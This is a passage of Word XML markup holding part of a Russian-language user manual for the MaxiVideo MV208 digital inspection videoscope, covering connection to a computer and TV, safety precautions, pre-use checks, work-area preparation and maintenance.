      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>окну.</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Используйте насадки из комплекта поставки видеоскопа, чтобы расширить возможности проведения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>обследований.</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Для подключения видеоскопа к компьютеру используется USB-кабель, входящий в комплект поставки. После подключения к компьютеру фотоснимки и видеозаписи, полученные с помощью видеоскопа, можно просматривать на экране монитора</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>компьютера.</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Подсоедините один конец видеокабеля к видеовыходу видеоскопа, а другой — к видеовходу телевизора, после чего на экране телевизора появится высококачественное изображение, передаваемое видеоголовкой в режиме реального</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_bookmark20"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Меры</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>предосторожности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Используйте видеоскоп только по назначению. Видеоскоп должен использоваться только после полного прочтения руководства пользователя и прохождения надлежащего</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>обучения.</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Дисплей видеоскопа не является водонепроницаемым. Видеоголовка и зонд влагонепроницаемы, но не обладают кислото- и огнестойкостью. Избегайте воздействия на видеоголовку и зонд коррозионных сред и масла. Держите видеоголовку и зонд вдали от источников высоких</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>температур.</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Оберегайте видеоскоп и дисплей от погружения в воду, чтобы уменьшить вероятность поражения электрическим током и повреждения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>оборудования.</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прилагайте чрезмерного усилия во время перемещения видеоголовки и зонда. В противном случае возможно повреждение видеоскопа или обследуемого объекта.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Запрещается использовать видеоголовку и зонд для перемещения предметов или устранения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>засоров.</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Запрещается размещать видеоголовки и зонд вблизи каких-либо токоведущих или подвижных частей, так как в противном случае повышается вероятность поражения электрическим током или получения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>травмы.</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используйте видеоскоп в личных или медицинских целях каким-либо образом. Данный видеоскоп не предназначен для медицинской</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>диагностики.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 xml:space="preserve">Не отвлекайтесь во время работы с видеоскопом. После использования видеоскопа для обследования канализационных труб и прочих мест, которые </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:lastRenderedPageBreak/>
        <w:t>могут содержать вредные химические вещества или бактерии, вымойте с помощью теплого мыльного раствора руки и другие загрязненные части тела, чтобы предотвратить загрязнение токсичными соединениями или заражение</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>инфекцией.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После завершения обследования аккуратно вытащите видеоголовку и зонд из проверяемой</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>области.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Храните неиспользуемые компоненты видеоскопа в местах, недоступных для детей и прочих неподготовленных лиц.</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Обращайтесь с видеоскопом бережно. Правильное применение видеоскопа уменьшает вероятность получения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">травмы. </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роняйте видеоскоп. После случайного падения прибора убедитесь в отсутствии повреждений и каких-либо других состояний, которые могут повлиять на работоспособность видеоскопа. Используйте только вспомогательные принадлежности, рекомендованные производителем</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскопа.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Во время работы с видеоскопом применяйте подходящие средства индивидуальной защиты. Рекомендуется применять следующие средства индивидуальной защиты: защитные очки, латексные или резиновые перчатки, защитные маски, защитную одежду, респираторы и обувь со стальными</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>набойками.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допускайте перегрева. Видеоскоп должен находиться вдали от объектов с повышенной температурой, таких как радиаторы, камины или другие источники тепла. Запрещается использовать видеоскоп вблизи подвижных частей механизмов или в местах с температурой выше +45</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>°C.</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Храните видеоскоп и его вспомогательные принадлежности в местах, недоступных для детей и лиц, которые не умеют обращаться с этим</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>прибором.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_bookmark21"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверка</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видеоскопа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВНИМАНИЕ! Проверьте работоспособность видеоскопа перед началом использования. Устраните выявленные недостатки, чтобы предотвратить повреждение видеоскопа и уменьшить вероятность серьезных травм вследствие поражения электрическим током и прочих причин.</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Убедитесь, что электропитание</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>отключено.</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Очистите видеоскоп от следов масла, смазки или загрязнений, особенно тщательно в области кнопок и разъемов. Загрязненные поверхности видеоскопа могут привести к его выскальзыванию из</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>рук.</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Убедитесь в отсутствии конденсата на линзах видеоголовки. В целях предотвращения повреждения видеоскопа запрещается использовать его при наличии конденсата внутри видеоголовки. Дождитесь испарения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>конденсата.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Убедитесь в отсутствии трещин или следов повреждений по всей длине зонда. Поврежденный зонд может позволить воде просочиться внутрь видеоскопа и привести к поражению электрическим</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>током.</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 xml:space="preserve">Убедитесь в надежности соединений между устройством отображения информации и зондом с видеоголовкой. Все соединения зонда должны быть </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:lastRenderedPageBreak/>
        <w:t>водонепроницаемыми.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Убедитесь в наличии, читаемости и надежности крепления предупредительной наклейки. Запрещается использовать видеоскоп без предупредительной</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>наклейки.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Включите электропитание и убедитесь, что после кратковременного отображения заставки с информацией о модели видеоскопа на экране дисплея начинает отображаться видео, передаваемое видеоголовкой в режиме реального</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">времени. </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Если видеоскоп не работает надлежащим образом после включения электропитания, передайте его на проверку квалифицированному техническому специалисту. Любой прибор, которые не контролируется с помощью кнопки электропитания, опасен и подлежит</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>ремонту.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Соблюдайте следующие меры предосторожности, чтобы избежать травм.</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СТЕН. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Во время обследования внутренних пустот стен обязательно отключите электроснабжение здания, используя автоматические выключатели.</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ТРУБ. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Если существует подозрение, что к металлической трубе приложен электрический потенциал, попросите квалифицированного электрика проверить это.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF"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АВТОМОБИЛЕЙ. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Убедитесь, что двигатель автомобиля выключен во время проверки. Металлические детали и емкости с жидкостями под капотом могут оказаться горячими. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Не допускайте воздействия масла или выхлопных газов на видеоголовку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_bookmark22"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Предварительная подготовка видеоскопа и рабочей</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зоны</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ОСТОРОЖНО! Выполните предварительную подготовку видеоскопа и рабочей зоны надлежащим образом, чтобы предотвратить повреждение видеоскопа и уменьшить вероятность серьезных травм вследствие поражения электрическим током и прочих причин.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Проверьте рабочую</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>зону.</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Убедитесь в достаточности уровня освещения.</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Из рабочей зоны необходимо удалить все предметы, которые могут привести к возникновению пожара. Видеоскоп не предназначен для использования во взрывоопасных средах, так как внутри него могут возникать электрические разряды.</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Запрещается использовать видеоскоп, стоя в воде.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Определите, подходит ли цифровой видеоскоп MaxiVideo</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TM</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve"> MV208 для обследования конкретной рабочей</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>зоны.</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Проверьте точки доступа к рабочей зоне.</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Убедитесь в правильности электроснабжения рабочей зоны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Уберите из рабочей зоны все жидкости, которые могут пролиться во время ее обследования с помощью видеоскопа. Видеоголовка и зонд водонепроницаемы при длине до 3 м. Зонды большей длины негерметичны, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>поэтому внутрь видеоголовки и зонда могут попасть жидкости с последующим поражением электрическим током или повреждением видеоскопа. Дисплей не защищен от проникновения влаги, поэтому не должен подвергаться воздействию условий повышенной влажности.</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Убедитесь в отсутствии агрессивных химических веществ в пределах рабочей зоны, особенно в канализационных трубах. Некоторые химические соединения могут повредить видеоскоп.</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Проверьте температуру рабочей зоны. Диапазон рабочих температур видеоскопа находится в пределах от 0 °</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> до +45 °</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</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Проверьте наличие подвижных частей в пределах обследуемой области.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Убедитесь в правильности проверки</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскопа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Подсоедините дополнительные принадлежности надлежащим образом в соответствии с вариантом применения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскопа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ОСТОРОЖНО! Перед выполнением технического обслуживания убедитесь, что электропитание видеоскопа отключено.</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Техническое обслуживание видеоскопа должно проводиться только высококвалифицированными сервисными специалистами. Проведение технического обслуживания неквалифицированными специалистами может привести к несчастному случаю.</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 xml:space="preserve">В качестве замены используйте только идентичные запасные части. Использование нерекомендуемых запасных частей или несоблюдение инструкций по техническому обслуживанию может привести к травме </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>поражению электрическим током.</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Запрещается касаться любых частей видеоскопа, если на это нет указаний в настоящем руководстве</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>пользователя.</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Соблюдайте указания по замене дополнительных</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>принадлежностей.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Для чистки видеоскопа запрещается использовать ацетон. Для очистки соединений возможно использование мягкой ткани, смоченной в этиловом спирте. Избегайте чрезмерного давления на экран ЖК-дисплея. После использования видеоскопа аккуратно протрите дисплей сухой</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>тканью.</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После окончания любого технического обслуживания видеоскопа попросите квалифицированного сервисного специалиста выполнить проверку работоспособности видеоскопа.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Немедленно прекратите использовать видеоскоп, если он начинает дымиться или издавать посторонний</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>запах.</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Всегда обращайтесь с видеоскопом бережно. Видеоскоп не является ударопрочным.</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разбирайте видеоскоп, если на это нет указаний в настоящем руководстве. В противном случае гарантия на видеоскоп будет</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>аннулирована.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Навигация по экрану</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дисплея</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
